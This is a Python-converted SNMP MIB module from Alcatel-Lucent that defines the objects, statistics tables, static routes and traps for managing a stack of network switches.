alcatelIND1StackMgrMIB.setDescription('This module describes an authoritative enterprise-specific Simple Network Management Protocol (SNMP) Management Information Base (MIB): For the Birds Of Prey Product Line Stack Manager The right to make changes in specification and other information contained in this document without prior notice is reserved. No liability shall be assumed for any incidental, indirect, special, or consequential damages whatsoever arising from or related to this document or the information contained herein. Vendors, end-users, and other interested parties are granted non-exclusive license to use this specification in connection with management of the products for which it is intended to be used. Copyright (C) 1995-2007 Alcatel-Lucent ALL RIGHTS RESERVED WORLDWIDE')
alcatel_ind1_stack_mgr_mib_objects = mib_identifier((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1))
alcatel_ind1_stack_mgr_mib_conformance = mib_identifier((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 2))
alcatel_ind1_stack_mgr_trap_objects = mib_identifier((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 3))
ala_stack_mgr_traps = mib_identifier((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 4))
class Alastackmgrlinknumber(TextualConvention, Integer32):
description = 'Lists the port numbers that the stackable ports can hold. Also the values are the same as the one marked on the Stack chassis pannel. These values are hardware dependent as follows: - First generation stackable switches - 24 ports: linkA27=27, linkB28=28, - First generation stackable switches - 48 ports: linkA51=51, linkB52=52, - 1st version of 2nd generation stackable switches : linkA31=31, linkB32=32. - 2nd version of 2nd generation stackable switches 24-port : linkA25=25, linkB26=26, - 2nd version of 2nd generation stackable switches 48-port : linkA29=29, linkB30=30.'
status = 'current'
subtype_spec = Integer32.subtypeSpec + constraints_union(single_value_constraint(27, 28, 51, 52, 31, 32, 25, 26, 29, 30, 1, 2))
named_values = named_values(('linkA27', 27), ('linkB28', 28), ('linkA51', 51), ('linkB52', 52), ('linkA31', 31), ('linkB32', 32), ('linkA25', 25), ('linkB26', 26), ('linkA29', 29), ('linkB30', 30), ('linkA', 1), ('linkB', 2))
class Alastackmgrninumber(TextualConvention, Integer32):
description = 'The numbers allocated for the stack NIs are as follows: - 0 = invalid slot number; - 1..8 = valid and assigned slot numbers corresponding values from the entPhysicalTable; - 1001..1008 = switches operating in pass through mode; - 255 = unassigned slot number.'
status = 'current'
subtype_spec = Integer32.subtypeSpec + value_range_constraint(0, 1008)
class Alastackmgrlinkstatus(TextualConvention, Integer32):
description = 'Provides the logical stack link status. The logical link is considered operational if the physical link is operational and communication with the adjacent switch is active. The possible values are: - up(1), - down(2).'
status = 'current'
subtype_spec = Integer32.subtypeSpec + constraints_union(single_value_constraint(1, 2))
named_values = named_values(('up', 1), ('down', 2))
class Alastackmgrslotrole(TextualConvention, Integer32):
description = 'Indicates the role of each switch within the stack as follows: - unassigned(0), - primary(1), - secondary(2), - idle(3), - standalone(4), - passthrough(5)'
status = 'current'
subtype_spec = Integer32.subtypeSpec + constraints_union(single_value_constraint(0, 1, 2, 3, 4, 5))
named_values = named_values(('unassigned', 0), ('primary', 1), ('secondary', 2), ('idle', 3), ('standalone', 4), ('passthrough', 5))
class Alastackmgrstackstatus(TextualConvention, Integer32):
description = 'Indicates whether the stack ring is or not in loop as follows: - loop(1), - noloop(2)'
status = 'current'
subtype_spec = Integer32.subtypeSpec + constraints_union(single_value_constraint(1, 2))
named_values = named_values(('loop', 1), ('noloop', 2))
class Alastackmgrslotstate(TextualConvention, Integer32):
description = "Current operational state of a stack element as follows: - running(1) : switch is fully operational, - duplicateSlot(2): switch operates in pass through mode due to slot duplication, - clearedSlot(3) : switch operates in pass through mode upon management command, - outOfSlots(4) : switch operates in pass through because the maximum number of allowed stackable swicthes has been reached, - outOfTokens(5) : switch operates in pass through mode because no tokens are available to be assigned. - badMix (6) : switch operates in pass through mode because it's not compatible with the existing stack."
status = 'current'
subtype_spec = Integer32.subtypeSpec + constraints_union(single_value_constraint(1, 2, 3, 4, 5, 6))
named_values = named_values(('running', 1), ('duplicateSlot', 2), ('clearedSlot', 3), ('outOfSlots', 4), ('outOfTokens', 5), ('badMix', 6))
class Alastackmgrcommandaction(TextualConvention, Integer32):
description = 'Identifies which of the following actions is to be performed: - notSiginificant(0) : no action, - clearSlot(1) : saved slot number will be removed from persistent database, - clearSlotImmediately : saved slot number will be cleared and change will be in effect right away causing the switch to enter in pass through mode, - reloadAny(3) : reboot an element regardless of its operational mode, - reloadPassThru(4) : reboot an element that is operating in pass thru mode.'
status = 'current'
subtype_spec = Integer32.subtypeSpec + constraints_union(single_value_constraint(0, 1, 2, 3, 4))
named_values = named_values(('notSignificant', 0), ('clearSlot', 1), ('clearSlotImmediately', 2), ('reloadAny', 3), ('reloadPassThru', 4))
class Alastackmgrcommandstatus(TextualConvention, Integer32):
description = 'Identifies the current status of the last action command received as follows: - notSignificant(0), - clearSlotInProgress(1), - clearSlotFailed(2), - clearSlotSuccess(3), - setSlotInProgress(4), - setSlotFailed(5), - setSlotSuccess(6).'
status = 'current'
subtype_spec = Integer32.subtypeSpec + constraints_union(single_value_constraint(0, 1, 2, 3, 4, 5, 6))
named_values = named_values(('notSignificant', 0), ('clearSlotInProgress', 1), ('clearSlotFailed', 2), ('clearSlotSuccess', 3), ('setSlotInProgress', 4), ('setSlotFailed', 5), ('setSlotSuccess', 6))
class Alastackmgrstackingmode(TextualConvention, Integer32):
description = 'Stacking mode, which specifies the ability of a switch to be part of a set of switches or virtual chassis: - stackable(1) :the switch may be stacked with other switches in the same virtual chassis. - standalone(2) :the switch is not allowed to be stacked together with other switches.'
status = 'current'
subtype_spec = Integer32.subtypeSpec + constraints_union(single_value_constraint(1, 2))
named_values = named_values(('stackable', 1), ('standalone', 2))
ala_stack_mgr_chassis_table = mib_table((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 1))
if mibBuilder.loadTexts:
alaStackMgrChassisTable.setStatus('current')
if mibBuilder.loadTexts:
alaStackMgrChassisTable.setDescription('Maintains a list with information about all the switches that participate on the stack herein refered to as chassis.')
ala_stack_mgr_chassis_entry = mib_table_row((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 1, 1)).setIndexNames((0, 'ALCATEL-IND1-STACK-MANAGER-MIB', 'alaStackMgrSlotNINumber'))
if mibBuilder.loadTexts:
alaStackMgrChassisEntry.setStatus('current')
if mibBuilder.loadTexts:
alaStackMgrChassisEntry.setDescription('Each entry corresponds to a chassis and lists its role and neighbors in the stack.')
ala_stack_mgr_slot_ni_number = mib_table_column((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 1, 1, 1), ala_stack_mgr_ni_number()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
alaStackMgrSlotNINumber.setStatus('current')
if mibBuilder.loadTexts:
alaStackMgrSlotNINumber.setDescription('Numbers allocated for the stack NIs as follows: - 0: invalid slot number - 1..8: valid and assigned slot numbers corresponding to values from the entPhysicalTable - 1001..1008: swicthes operating in pass through mode - 255: unassigned slot number.')
ala_stack_mgr_slot_cmm_number = mib_table_column((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 1, 1, 2), integer32().subtype(subtypeSpec=value_range_constraint(0, 72))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
alaStackMgrSlotCMMNumber.setStatus('current')
if mibBuilder.loadTexts:
alaStackMgrSlotCMMNumber.setDescription('The numbers allocated for the stack CMMs are from 65..72 or 0 if not present')
ala_stack_mgr_chas_role = mib_table_column((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 1, 1, 3), ala_stack_mgr_slot_role()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
alaStackMgrChasRole.setStatus('current')
if mibBuilder.loadTexts:
alaStackMgrChasRole.setDescription('The current role of the chassis as follows: - unassigned(0), - primary(1), - secondary(2), - idle(3), - standalone(4), - passthrough(5).')
ala_stack_mgr_local_link_state_a = mib_table_column((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 1, 1, 4), ala_stack_mgr_link_status()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
alaStackMgrLocalLinkStateA.setStatus('current')
if mibBuilder.loadTexts:
alaStackMgrLocalLinkStateA.setDescription('1 indicates that the stacking link A is up, which means it knows its adjacent node. 2 indicates that the stacking link A is inactive and RemoteNISlotA and RemoteLinkA are not significants.')
ala_stack_mgr_remote_ni_slot_a = mib_table_column((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 1, 1, 5), ala_stack_mgr_ni_number()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
alaStackMgrRemoteNISlotA.setStatus('current')
if mibBuilder.loadTexts:
alaStackMgrRemoteNISlotA.setDescription(' This is the remote NI slot seen by the current NI through its stacking link A. The numbers allocated for the Stack NIs are 1..8, 1001..1008 or 0 if not present')
ala_stack_mgr_remote_link_a = mib_table_column((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 1, 1, 6), ala_stack_mgr_link_number()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
alaStackMgrRemoteLinkA.setStatus('current')
if mibBuilder.loadTexts:
alaStackMgrRemoteLinkA.setDescription('This is the remote link of the remote NI slot seen through the stacking link A. The values for these ports are platform dependent. The possible values are: - 0: not present - linkA: 25, 27, 29, 31 or 51 - linkB: 26, 28, 30, 32 or 52.')
ala_stack_mgr_local_link_state_b = mib_table_column((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 1, 1, 7), ala_stack_mgr_link_status()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
alaStackMgrLocalLinkStateB.setStatus('current')
if mibBuilder.loadTexts:
alaStackMgrLocalLinkStateB.setDescription('1 indicates that the stacking link B is up, which means it knows its adjacent node. 2 indicates that the stacking link B is inactive and RemoteNISlotB and RemoteLinkB are not significants.')
ala_stack_mgr_remote_ni_slot_b = mib_table_column((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 1, 1, 8), ala_stack_mgr_ni_number()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
alaStackMgrRemoteNISlotB.setStatus('current')
if mibBuilder.loadTexts:
alaStackMgrRemoteNISlotB.setDescription(' This is the remote NI slot seen by the current NI through its stacking link B. The numbers allocated for the Stack NIs are 1..8, 1001..1008 or 0 if not present')
ala_stack_mgr_remote_link_b = mib_table_column((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 1, 1, 9), ala_stack_mgr_link_number()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
alaStackMgrRemoteLinkB.setStatus('current')
if mibBuilder.loadTexts:
alaStackMgrRemoteLinkB.setDescription('This is the remote link of the remote NI slot seen through the stacking link B. The values for these ports are platform dependent. The possible values are: - 0: not present - linkA: 25, 27, 29, 31 or 51 - linkB: 26, 28, 30, 32 or 52.')
ala_stack_mgr_chas_state = mib_table_column((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 1, 1, 10), ala_stack_mgr_slot_state()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
alaStackMgrChasState.setStatus('current')
if mibBuilder.loadTexts:
alaStackMgrChasState.setDescription('This current state of the chassis: running (1), duplicateSlot (2), clearedSlot (3), outOfSlots (4), outOfTokens (5), or badMix (6).')
ala_stack_mgr_saved_slot_ni_number = mib_table_column((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 1, 1, 11), ala_stack_mgr_ni_number()).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
alaStackMgrSavedSlotNINumber.setStatus('current')
if mibBuilder.loadTexts:
alaStackMgrSavedSlotNINumber.setDescription('Slot number stored in persistent memory that will be in effect if the stack element reboots. Only slot numbers in the range 1..8 are allowed.')
ala_stack_mgr_command_action = mib_table_column((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 1, 1, 12), ala_stack_mgr_command_action()).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
alaStackMgrCommandAction.setStatus('current')
if mibBuilder.loadTexts:
alaStackMgrCommandAction.setDescription('This object identifies which of the following Actions is to be performed: clearSlot(1), clearSlotImmediately (2) or reload (3). Whenever a new command is received, the value of the object alaStackMgrCommandStatus will be updated accordingly.')
ala_stack_mgr_command_status = mib_table_column((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 1, 1, 13), ala_stack_mgr_command_status()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
alaStackMgrCommandStatus.setStatus('current')
if mibBuilder.loadTexts:
alaStackMgrCommandStatus.setDescription('This object provides the current status of last command received from the management as follows: notSignificant(0), clearSlotInProgress(1), clearSlotFailed(2), clearSlotSuccess(3), setSlotInProgress(4), setSlotFailed(5) or setSlotSuccess(6). New commands are only accepted if the value of this object is different than setSlotInProgress and clearSlotInProgress.')
ala_stack_mgr_oper_stacking_mode = mib_table_column((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 1, 1, 14), ala_stack_mgr_stacking_mode()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
alaStackMgrOperStackingMode.setStatus('current')
if mibBuilder.loadTexts:
alaStackMgrOperStackingMode.setDescription('This object specifies the current running mode of the switch.')
ala_stack_mgr_admin_stacking_mode = mib_table_column((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 1, 1, 15), ala_stack_mgr_stacking_mode()).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
alaStackMgrAdminStackingMode.setStatus('current')
if mibBuilder.loadTexts:
alaStackMgrAdminStackingMode.setDescription('This object specifies the stack mode atained on reload.')
ala_stack_mgr_stats_table = mib_table((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 2))
if mibBuilder.loadTexts:
alaStackMgrStatsTable.setStatus('current')
if mibBuilder.loadTexts:
alaStackMgrStatsTable.setDescription('Stack port statistics table.')
ala_stack_mgr_stats_entry = mib_table_row((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 2, 1)).setIndexNames((0, 'ALCATEL-IND1-STACK-MANAGER-MIB', 'alaStackMgrSlotNINumber'), (0, 'ALCATEL-IND1-STACK-MANAGER-MIB', 'alaStackMgrStatLinkNumber'))
if mibBuilder.loadTexts:
alaStackMgrStatsEntry.setStatus('current')
if mibBuilder.loadTexts:
alaStackMgrStatsEntry.setDescription(' Stats table for stackable ports.')
ala_stack_mgr_stat_link_number = mib_table_column((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 2, 1, 1), ala_stack_mgr_link_number()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
alaStackMgrStatLinkNumber.setStatus('current')
if mibBuilder.loadTexts:
alaStackMgrStatLinkNumber.setDescription(' Local link refers to the stacking port on each slot. The values of these ports are: - linkA: 25, 27, 29, 31 or 51 - linkB: 26, 28, 30, 32 or 52.')
ala_stack_mgr_stat_pkts_rx = mib_table_column((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 2, 1, 2), counter32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
alaStackMgrStatPktsRx.setStatus('current')
if mibBuilder.loadTexts:
alaStackMgrStatPktsRx.setDescription('The total number of packets recieved on this port.')
ala_stack_mgr_stat_pkts_tx = mib_table_column((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 2, 1, 3), counter32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
alaStackMgrStatPktsTx.setStatus('current')
if mibBuilder.loadTexts:
alaStackMgrStatPktsTx.setDescription('The total number of packets transmitted on this port.')
ala_stack_mgr_stat_errors_rx = mib_table_column((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 2, 1, 4), counter32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
alaStackMgrStatErrorsRx.setStatus('current')
if mibBuilder.loadTexts:
alaStackMgrStatErrorsRx.setDescription('The total number of packets in error - received on the port.')
ala_stack_mgr_stat_errors_tx = mib_table_column((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 2, 1, 5), counter32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
alaStackMgrStatErrorsTx.setStatus('current')
if mibBuilder.loadTexts:
alaStackMgrStatErrorsTx.setDescription('The total number of packets in error - transmitted on the port.')
ala_stack_mgr_stat_delay_from_last_msg = mib_table_column((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 2, 1, 6), integer32().subtype(subtypeSpec=value_range_constraint(0, 2147483647))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
alaStackMgrStatDelayFromLastMsg.setStatus('current')
if mibBuilder.loadTexts:
alaStackMgrStatDelayFromLastMsg.setDescription('The delay since the last message.')
ala_stack_mgr_stack_status = mib_scalar((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 3), ala_stack_mgr_stack_status()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
alaStackMgrStackStatus.setStatus('current')
if mibBuilder.loadTexts:
alaStackMgrStackStatus.setDescription('Indicates whether the Stack is or not in Loop.')
ala_stack_mgr_tokens_used = mib_scalar((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 4), integer32().subtype(subtypeSpec=value_range_constraint(0, 255))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
alaStackMgrTokensUsed.setStatus('current')
if mibBuilder.loadTexts:
alaStackMgrTokensUsed.setDescription('Indicates the total number of tokens that have been allocated to all the elements in the stack.')
ala_stack_mgr_tokens_available = mib_scalar((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 5), integer32().subtype(subtypeSpec=value_range_constraint(0, 255))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
alaStackMgrTokensAvailable.setStatus('current')
if mibBuilder.loadTexts:
alaStackMgrTokensAvailable.setDescription('Indicates the total number of tokens that are still available and that potentially may be allocated to elements of the stack.')
ala_stack_mgr_static_route_table = mib_table((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 6))
if mibBuilder.loadTexts:
alaStackMgrStaticRouteTable.setStatus('current')
if mibBuilder.loadTexts:
alaStackMgrStaticRouteTable.setDescription('Maintains a list with information about all the static routes in the stack.')
ala_stack_mgr_static_route_entry = mib_table_row((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 6, 1)).setIndexNames((0, 'ALCATEL-IND1-STACK-MANAGER-MIB', 'alaStackMgrStaticRouteSrcStartIf'), (0, 'ALCATEL-IND1-STACK-MANAGER-MIB', 'alaStackMgrStaticRouteSrcEndIf'), (0, 'ALCATEL-IND1-STACK-MANAGER-MIB', 'alaStackMgrStaticRouteDstStartIf'), (0, 'ALCATEL-IND1-STACK-MANAGER-MIB', 'alaStackMgrStaticRouteDstEndIf'))
if mibBuilder.loadTexts:
alaStackMgrStaticRouteEntry.setStatus('current')
if mibBuilder.loadTexts:
alaStackMgrStaticRouteEntry.setDescription('Each entry corresponds to a static route and lists its source and destination in the stack.')
ala_stack_mgr_static_route_src_start_if = mib_table_column((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 6, 1, 1), interface_index())
if mibBuilder.loadTexts:
alaStackMgrStaticRouteSrcStartIf.setStatus('current')
if mibBuilder.loadTexts:
alaStackMgrStaticRouteSrcStartIf.setDescription('The physical identification number for start source range of the static route')
ala_stack_mgr_static_route_src_end_if = mib_table_column((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 6, 1, 2), interface_index())
if mibBuilder.loadTexts:
alaStackMgrStaticRouteSrcEndIf.setStatus('current')
if mibBuilder.loadTexts:
alaStackMgrStaticRouteSrcEndIf.setDescription('The physical identification number for end source range of the static route')
ala_stack_mgr_static_route_dst_start_if = mib_table_column((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 6, 1, 3), interface_index())
if mibBuilder.loadTexts:
alaStackMgrStaticRouteDstStartIf.setStatus('current')
if mibBuilder.loadTexts:
alaStackMgrStaticRouteDstStartIf.setDescription('The physical identification number for start destination range of the static route')
ala_stack_mgr_static_route_dst_end_if = mib_table_column((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 6, 1, 4), interface_index())
if mibBuilder.loadTexts:
alaStackMgrStaticRouteDstEndIf.setStatus('current')
if mibBuilder.loadTexts:
alaStackMgrStaticRouteDstEndIf.setDescription('The physical identification number for end destination range of the static route')
ala_stack_mgr_static_route_port = mib_table_column((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 6, 1, 5), ala_stack_mgr_link_number().clone(1)).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
alaStackMgrStaticRoutePort.setStatus('current')
if mibBuilder.loadTexts:
alaStackMgrStaticRoutePort.setDescription('This is the stack link to the destination NI slot . The values for these ports are platform dependent. The possible values are: - 0: not present - linkA: 25, 27, 29, 31 or 51 - linkB: 26, 28, 30, 32 or 52. Incase of static routesthe value is either 1(STACKA) or 2(STACKB)')
ala_stack_mgr_static_route_port_state = mib_table_column((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 6, 1, 6), ala_stack_mgr_link_status()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
alaStackMgrStaticRoutePortState.setStatus('current')
if mibBuilder.loadTexts:
alaStackMgrStaticRoutePortState.setDescription('1 indicates that the static route stacking link is up . 2 indicates that the stacking link is inactive.')
ala_stack_mgr_static_route_status = mib_table_column((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 6, 1, 7), integer32().subtype(subtypeSpec=constraints_union(single_value_constraint(1, 2))).clone(namedValues=named_values(('on', 1), ('off', 2))).clone('on')).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
alaStackMgrStaticRouteStatus.setStatus('current')
if mibBuilder.loadTexts:
alaStackMgrStaticRouteStatus.setDescription('Whether this static route is enabled or disabled .')
ala_stack_mgr_static_route_row_status = mib_table_column((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 1, 6, 1, 8), row_status()).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
alaStackMgrStaticRouteRowStatus.setStatus('current')
if mibBuilder.loadTexts:
alaStackMgrStaticRouteRowStatus.setDescription('The status of this table entry. ')
ala_stack_mgr_trap_link_number = mib_scalar((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 3, 1), ala_stack_mgr_link_number()).setMaxAccess('accessiblefornotify')
if mibBuilder.loadTexts:
alaStackMgrTrapLinkNumber.setStatus('current')
if mibBuilder.loadTexts:
alaStackMgrTrapLinkNumber.setDescription('Holds the link number, when the stack is not in loop.')
ala_stack_mgr_primary = mib_scalar((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 3, 2), ala_stack_mgr_ni_number()).setMaxAccess('accessiblefornotify')
if mibBuilder.loadTexts:
alaStackMgrPrimary.setStatus('current')
if mibBuilder.loadTexts:
alaStackMgrPrimary.setDescription('Holds the slot number of the stack element that plays the role of Primary.')
ala_stack_mgr_secondary = mib_scalar((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 3, 3), ala_stack_mgr_ni_number()).setMaxAccess('accessiblefornotify')
if mibBuilder.loadTexts:
alaStackMgrSecondary.setStatus('current')
if mibBuilder.loadTexts:
alaStackMgrSecondary.setDescription('Holds the slot number of the stack element that plays the role of Secondary.')
ala_stack_mgr_duplicate_slot_trap = notification_type((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 4, 0, 1)).setObjects(('ALCATEL-IND1-STACK-MANAGER-MIB', 'alaStackMgrSlotNINumber'))
if mibBuilder.loadTexts:
alaStackMgrDuplicateSlotTrap.setStatus('current')
if mibBuilder.loadTexts:
alaStackMgrDuplicateSlotTrap.setDescription('The element specified by alaStackMgrSlotNINumber has the same slot number of another element of the stack and it must relinquish its operational status because it has a higher election key (up time, slot, mac). The elements will be put in pass through mode.')
ala_stack_mgr_neighbor_change_trap = notification_type((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 4, 0, 2)).setObjects(('ALCATEL-IND1-STACK-MANAGER-MIB', 'alaStackMgrStackStatus'), ('ALCATEL-IND1-STACK-MANAGER-MIB', 'alaStackMgrSlotNINumber'), ('ALCATEL-IND1-STACK-MANAGER-MIB', 'alaStackMgrTrapLinkNumber'))
if mibBuilder.loadTexts:
alaStackMgrNeighborChangeTrap.setStatus('current')
if mibBuilder.loadTexts:
alaStackMgrNeighborChangeTrap.setDescription('Indicates whether the stack is in loop or not. In case of no loop, alaStackMgrSlotNINumber and alaStackMgrTrapLinkNumber indicate where the Stack is broken')
ala_stack_mgr_role_change_trap = notification_type((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 4, 0, 3)).setObjects(('ALCATEL-IND1-STACK-MANAGER-MIB', 'alaStackMgrPrimary'), ('ALCATEL-IND1-STACK-MANAGER-MIB', 'alaStackMgrSecondary'))
if mibBuilder.loadTexts:
alaStackMgrRoleChangeTrap.setStatus('current')
if mibBuilder.loadTexts:
alaStackMgrRoleChangeTrap.setDescription(' Role Change Trap. Indicates that a new primary or secondary is elected.')
ala_stack_mgr_duplicate_role_trap = notification_type((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 4, 0, 4)).setObjects(('ALCATEL-IND1-STACK-MANAGER-MIB', 'alaStackMgrSlotNINumber'), ('ALCATEL-IND1-STACK-MANAGER-MIB', 'alaStackMgrChasRole'))
if mibBuilder.loadTexts:
alaStackMgrDuplicateRoleTrap.setStatus('current')
if mibBuilder.loadTexts:
alaStackMgrDuplicateRoleTrap.setDescription('The element identified by alaStackMgrSlotNINumber detected the presence of two elements with the same primary or secondary role as specified by alaStackMgrChasRole on the stack.')
ala_stack_mgr_cleared_slot_trap = notification_type((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 4, 0, 5)).setObjects(('ALCATEL-IND1-STACK-MANAGER-MIB', 'alaStackMgrSlotNINumber'))
if mibBuilder.loadTexts:
alaStackMgrClearedSlotTrap.setStatus('current')
if mibBuilder.loadTexts:
alaStackMgrClearedSlotTrap.setDescription('The element identified by alaStackMgrSlotNINumber will enter the pass through mode because its operational slot was cleared with immediate effect.')
ala_stack_mgr_out_of_slots_trap = notification_type((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 4, 0, 6))
if mibBuilder.loadTexts:
alaStackMgrOutOfSlotsTrap.setStatus('current')
if mibBuilder.loadTexts:
alaStackMgrOutOfSlotsTrap.setDescription('One element of the stack will enter the pass through mode because there are no slot numbers available to be assigned to this element.')
ala_stack_mgr_out_of_tokens_trap = notification_type((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 4, 0, 7)).setObjects(('ALCATEL-IND1-STACK-MANAGER-MIB', 'alaStackMgrSlotNINumber'))
if mibBuilder.loadTexts:
alaStackMgrOutOfTokensTrap.setStatus('current')
if mibBuilder.loadTexts:
alaStackMgrOutOfTokensTrap.setDescription('The element identified by alaStackMgrSlotNINumber will enter the pass through mode because there are no tokens available to be assigned to this element.')
ala_stack_mgr_out_of_pass_thru_slots_trap = notification_type((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 4, 0, 8))
if mibBuilder.loadTexts:
alaStackMgrOutOfPassThruSlotsTrap.setStatus('current')
if mibBuilder.loadTexts:
alaStackMgrOutOfPassThruSlotsTrap.setDescription('There are no pass through slots available to be assigned to an element that is supposed to enter the pass through mode.')
ala_stack_mgr_bad_mix_trap = notification_type((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 4, 0, 9)).setObjects(('ALCATEL-IND1-STACK-MANAGER-MIB', 'alaStackMgrSlotNINumber'))
if mibBuilder.loadTexts:
alaStackMgrBadMixTrap.setStatus('current')
if mibBuilder.loadTexts:
alaStackMgrBadMixTrap.setDescription('The element identified by alaStackMgrSlotNINumber will enter the pass through mode because it is not compatible with the existing stack.')
alcatel_ind1_stack_mgr_mib_groups = mib_identifier((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 2, 1))
alcatel_ind1_stack_mgr_mib_compliances = mib_identifier((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 2, 2))
